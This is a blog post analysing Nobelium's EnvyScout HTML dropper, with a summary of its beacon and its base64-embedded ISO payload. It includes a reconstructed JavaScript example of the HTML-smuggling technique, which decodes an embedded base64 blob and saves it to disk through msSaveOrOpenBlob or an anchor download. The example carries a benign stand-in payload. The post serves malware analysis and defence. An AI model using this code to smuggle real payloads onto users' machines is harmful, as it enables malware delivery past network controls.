p1k4chu@p1k4chu-host
Analyzing Nobelium's HTML Dropper - EnvyScout

TL;DR: In a recent incident, Nobelium (APT29) used an HTML dropper that decodes a base64 payload embedded in the page itself and writes the resulting file (an ISO image) to disk.

Last updated 1 year ago

Recently, I got my hands on a malware sample used by Nobelium / APT29 and wanted to use this opportunity to learn and revise my malware analysis skills.

Please review my work and provide feedback on my n00b-ish attempt at malware analysis.

Analysis Summary:

  • [ASSUMPTION] The attacker sends a malicious HTML file, or a link to one, to the victim

  • [ASSUMPTION] The victim opens the file in a browser

  • The page carries a hardcoded base64 string (~2.8 MB) that the JavaScript decodes into an ArrayBuffer

  • That buffer, which turns out to be an ISO image, is written to disk through the browser's built-in file-save API (window.navigator.msSaveOrOpenBlob); the payload is embedded in the page rather than fetched from a server

  • The ISO contains 3 files: an EXE and 2 DLLs. While these were interesting, that's a story for another day.

Analysis In-Detail:

At first look, the HTML dropper seems to be built in a not-so-sophisticated way: we immediately encounter a hardcoded malicious domain that the malware communicates with. What's more eye-popping for a malware analyst than a malicious domain hardcoded in a sample?

Moving on, they seem to be sending a beacon-ping (kind of like a "Hi, someone clicked me") to their malicious URL along with the IP of the user and the user agent. I'm not sure why they were sending a request to IPIFY. I assume they wanted to get the current IP of the user, but they're not really utilizing it. Seems like unfinished code (not surprised). However, this is just a function, and we'll have to see when it is actually called.

Further down, there is a string (~2.8 MB) which is base64 encoded.

Combining both pieces, it looks like the JS decodes the base64 string into an array buffer and writes it to disk using the previously discovered function. Dynamic analysis indicates that it's an ISO file containing possibly malicious samples.

This looks like a previously documented variant; see the references at the end of this post.

Analyzing the code more deeply, the first function takes an input text and uses the "window.navigator.msSaveOrOpenBlob" API to save a file to disk. Now, I'm not a JS expert by any means, but I can do good googling (if that's even a word, lol), and it looks like our folks have taken some inspiration (pun intended) from CodePen. After all, they are like normal developers who love copying code from online.

Below that is the function that does all the magic. Again, not a JS expert, but it looks like they copied yet another piece of code, this time from StackOverflow.
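For readers who are not JS experts either, here is what that pair of functions boils down to. This is an added example written for this post, not the dropper's code: decodeSmuggledPayload reproduces the common atob-plus-Uint8Array conversion (the kind of snippet the post attributes to StackOverflow), and dropFile reproduces the msSaveOrOpenBlob save together with the object-URL anchor fallback that browsers without that legacy API need. The base64 literal is a constructed 20-byte text payload standing in for the ~2.8 MB ISO, and the function names and the injectable `win` parameter are my assumptions.

```javascript
// Added example (not the dropper's code): the HTML-smuggling primitive,
// reconstructed in benign form. Constructed stand-in for the sample's
// hard-coded base64 literal: "benign demo payload\n" (20 bytes), not an ISO.
const PAYLOAD_B64 = 'YmVuaWduIGRlbW8gcGF5bG9hZAo=';

// Browsers and Node 18+ expose Blob globally; older Node needs the buffer module.
const BlobCtor = globalThis.Blob || require('node:buffer').Blob;

// Step 1: base64 text -> raw bytes, done in slices the way the widely copied
// StackOverflow snippet does it. atob() yields a "binary string" whose char
// codes are the byte values; the loop moves them into a Uint8Array.
function decodeSmuggledPayload(b64, sliceSize = 512) {
  const binary = atob(b64);
  const chunks = [];
  for (let offset = 0; offset < binary.length; offset += sliceSize) {
    const slice = binary.slice(offset, offset + sliceSize);
    const bytes = new Uint8Array(slice.length);
    for (let i = 0; i < slice.length; i++) bytes[i] = slice.charCodeAt(i);
    chunks.push(bytes);
  }
  const out = new Uint8Array(chunks.reduce((n, c) => n + c.length, 0));
  let pos = 0;
  for (const c of chunks) { out.set(c, pos); pos += c.length; }
  return out;
}

// Step 2: wrap the bytes in a Blob and hand them to the browser's save path.
// `win` is injectable so each branch can be exercised outside a browser.
// Returns which path was taken.
function dropFile(filename, bytes, mime, win = globalThis) {
  const blob = new BlobCtor([bytes], { type: mime });
  // Legacy IE / EdgeHTML API used by the sample: shows a Save/Open prompt.
  if (win.navigator && typeof win.navigator.msSaveOrOpenBlob === 'function') {
    win.navigator.msSaveOrOpenBlob(blob, filename);
    return 'msSaveOrOpenBlob';
  }
  // Everything else: object URL + synthetic click on an <a download>.
  if (win.document && win.URL && typeof win.URL.createObjectURL === 'function') {
    const url = win.URL.createObjectURL(blob);
    const a = win.document.createElement('a');
    a.href = url;
    a.download = filename;
    win.document.body.appendChild(a);
    a.click();
    win.document.body.removeChild(a);
    win.URL.revokeObjectURL(url);
    return 'anchor-download';
  }
  return 'no-save-path';
}

// Stand-alone run: decode, then attempt the drop. Under Node this reports
// 'no-save-path' because there is no document to click through.
const demoBytes = decodeSmuggledPayload(PAYLOAD_B64);
console.log(demoBytes.length, 'bytes decoded;', dropFile('demo.txt', demoBytes, 'text/plain'));
```

Note what is absent: no fetch, no XMLHttpRequest. The whole payload arrives inside the page, which is why proxy and download-scanning controls keyed on the file transfer never see an ISO; the only network artefacts the post describes are the beacon-ping and the ipify lookup. The file write by the browser is the first event a host-side control can act on.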

There seem to be 2 DLLs and 1 EXE dropped as part of the malware package. Looks interesting and will definitely keep me occupied after work.

Screenshots in the original post: Nobelium's HTML loader; Code on CodePen; Malware sample analysis; Malware sample; Code on StackOverflow; The malicious ISO file; Contents of the malicious ISO.

References:

  • https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
  • https://www.cyfirma.com/outofband/html-smuggling-a-stealthier-approach-to-deliver-malware/
  • https://digital.nhs.uk/cyber-alerts/2021/cc-3878
  • https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage
  • https://blog.sekoia.io/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/